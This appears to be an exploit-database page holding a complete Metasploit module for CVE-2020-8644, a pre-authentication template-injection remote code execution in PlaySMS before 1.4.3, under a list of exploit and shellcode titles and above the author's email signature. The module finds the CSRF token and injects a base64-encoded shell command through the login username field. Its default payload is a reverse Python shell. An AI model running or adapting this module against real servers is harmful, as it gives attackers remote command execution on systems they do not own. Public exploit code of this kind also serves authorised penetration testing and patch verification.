
51 changes to exploits/shellcodes Tor Browser < 0.3.2.10 - Use After Free (PoC) Notepad++ < 7.7 (x64) - Denial of Service SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service InputMapper 1.6.10 - Denial of Service SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) XnConvert 1.82 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC) SpotDialup 1.6.7 - 'Key' Denial of Service (PoC) Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC) FreeBSD 12.0 - 'fd' Local Privilege Escalation iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH) DeviceViewer 3.12.0.1 - Arbitrary Password Change Winrar 5.80 - XML External Entity Injection Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution Siemens TIA Portal - Remote Command Execution Android 7 < 9 - Remote Code Execution CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit) CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit) CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit) MyBB < 1.8.21 - Remote Code Execution Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery Publisure Hybrid - Multiple Vulnerabilities NetGain EM Plus 10.1.68 - Remote Command Execution Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion DotNetNuke 9.3.2 - Cross-Site Scripting VehicleWorkshop 1.0 - 'bookingid' SQL Injection WordPress Plugin Tutor.1.5.3 - Local File Inclusion WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting WordPress Plugin Wordfence.7.4.5 - Local File Disclosure WordPress Plugin contact-form-7 5.1.6 - Remote File Upload WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting Joomla! 3.9.0 < 3.9.7 - CSV Injection PlaySMS 1.4.3 - Template Injection / Remote Code Execution Wing FTP Server - Authenticated CSRF (Delete Admin) WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification UADMIN Botnet 1.0 - 'link' SQL Injection Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload Wordpress Plugin PicUploader 1.0 - Remote File Upload PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution WordPress Plugin Helpful 2.4.11 - SQL Injection Prestashop 1.7.6.4 - Cross-Site Request Forgery WordPress Plugin Simple File List 5.4 - Remote Code Execution Library CMS Powerful Book Management System 2.2.0 - Session Fixation Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection Beauty Parlour Management System 1.0 - Authentication Bypass Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes) Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
189 lines
No EOL
5.8 KiB
Text
189 lines
No EOL
5.8 KiB
Text
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'PlaySMS 1.4.3 Pre Auth Template Injection Remote Code
|
|
Execution',
|
|
'Description' => %q{
|
|
This module exploits a Preauth Server-Side Template Injection
|
|
leads remote code execution vulnerability in PlaySMS Before Version 1.4.3.
|
|
This issue is caused by Double processes a server-side template
|
|
by Custom PHP Template system called 'TPL'.
|
|
which is used in PlaySMS template engine location
|
|
src/Playsms/Tpl.php:_compile(). When Attacker supply username with a
|
|
malicious payload
|
|
and submit. This malicious payload first process by TPL and
|
|
save the value in the current template after this value goes for the second
|
|
process
|
|
which result in code execution.
|
|
The TPL(https://github.com/antonraharja/tpl) template language
|
|
is vulnerable to PHP code injection.
|
|
|
|
This module was tested against PlaySMS 1.4 on HackTheBox's
|
|
Forlic Machine.
|
|
},
|
|
'Author' =>
|
|
[
|
|
'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit
|
|
Module
|
|
'Lucas Rosevear' # Found and Initial PoC by NCC Groupd
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
['CVE','2020-8644'],
|
|
['URL','
|
|
https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/
|
|
']
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'SSL' => false,
|
|
'PAYLOAD' => 'cmd/unix/reverse_python'
|
|
},
|
|
'Privileged' => false,
|
|
'Platform' => %w[unix linux],
|
|
'Arch' => ARCH_CMD,
|
|
'Payload' =>
|
|
{
|
|
'Compat' =>
|
|
{
|
|
'PayloadType' => 'cmd',
|
|
'RequiredCmd' => 'python'
|
|
}
|
|
},
|
|
'Targets' =>
|
|
[
|
|
[ 'PlaySMS Before 1.4.3', { } ],
|
|
],
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => 'Feb 05 2020'))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('TARGETURI', [ true, "Base playsms directory path",
|
|
'/']),
|
|
])
|
|
end
|
|
|
|
def uri
|
|
return target_uri.path
|
|
end
|
|
|
|
def check
|
|
begin
|
|
res = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri(uri, 'index.php')
|
|
})
|
|
rescue
|
|
vprint_error('Unable to access the index.php file')
|
|
return CheckCode::Unknown
|
|
end
|
|
|
|
if res.code == 302 &&
|
|
res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')
|
|
return Exploit::CheckCode::Appears
|
|
end
|
|
|
|
return CheckCode::Safe
|
|
end
|
|
|
|
#Send Payload in Login Request
|
|
def login
|
|
res = send_request_cgi({
|
|
'uri' => normalize_uri(uri, 'index.php'),
|
|
'method' => 'GET',
|
|
'vars_get' => {
|
|
'app' => 'main',
|
|
'inc' => 'core_auth',
|
|
'route' => 'login',
|
|
}
|
|
})
|
|
|
|
# Grabbing CSRF token from body
|
|
/name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
|
|
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine
|
|
CSRF token") if csrf.nil?
|
|
vprint_good("X-CSRF-Token for login : #{csrf}")
|
|
|
|
cookies = res.get_cookies
|
|
|
|
vprint_status('Trying to Send Payload in Username Field ......')
|
|
|
|
#Encoded in base64 to avoid HTML TAGS which is filter by Application.
|
|
evil = "{{`printf #{Rex::Text.encode_base64(payload.encode)}|base64
|
|
-d |sh`}}"
|
|
|
|
# Send Payload with cookies.
|
|
res = send_request_cgi({
|
|
'method' => 'POST',
|
|
'uri' => normalize_uri(uri, 'index.php'),
|
|
'cookie' => cookies,
|
|
'vars_get' => Hash[{
|
|
'app' => 'main',
|
|
'inc' => 'core_auth',
|
|
'route' => 'login',
|
|
'op' => 'login',
|
|
}.to_a.shuffle],
|
|
'vars_post' => Hash[{
|
|
'X-CSRF-Token' => csrf,
|
|
'username' => evil,
|
|
'password' => ''
|
|
}.to_a.shuffle],
|
|
})
|
|
|
|
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to
|
|
Login request") if res.nil?
|
|
|
|
# Request Status Check
|
|
if res.code == 302
|
|
print_good("Payload successfully Sent")
|
|
return cookies
|
|
else
|
|
fail_with(Failure::UnexpectedReply, "#{peer} - Something Goes
|
|
Wrong")
|
|
end
|
|
end
|
|
|
|
def exploit
|
|
cookies = login
|
|
vprint_status("Cookies here : #{cookies}")
|
|
# Execute Last Sent Username.
|
|
res = send_request_cgi({
|
|
'uri' => normalize_uri(uri, 'index.php'),
|
|
'method' => 'GET',
|
|
'cookie' => cookies,
|
|
'vars_get' => {
|
|
'app' => 'main',
|
|
'inc' => 'core_auth',
|
|
'route' => 'login',
|
|
}
|
|
})
|
|
end
|
|
end
|
|
|
|
--
|
|
Touhid Shaikh
|
|
Exploit Researcher and Developer | Security Consultant
|
|
m: +91 7738794435
|
|
e: touhidshaikh22@gmail.com
|
|
www.touhidshaikh.com [image: Facebook icon]
|
|
<https://www.facebook.com/tauheeds1> [image: LinkedIn icon]
|
|
<https://www.linkedin.com/in/touhidshaikh22/> [image: Twitter icon]
|
|
<https://twitter.com/touhidshaikh22> [image: Youtube icon]
|
|
<https://www.youtube.com/touhidshaikh22>
|
|
|
|
The content of this email is confidential and intended for the recipient
|
|
specified in message only. It is strictly forbidden to share any part of
|
|
this message with any third party, without a written consent of the sender.
|
|
If you received this message by mistake, please reply to this message and
|
|
follow with its deletion, so that we can ensure such a mistake does not
|
|
occur in the future. |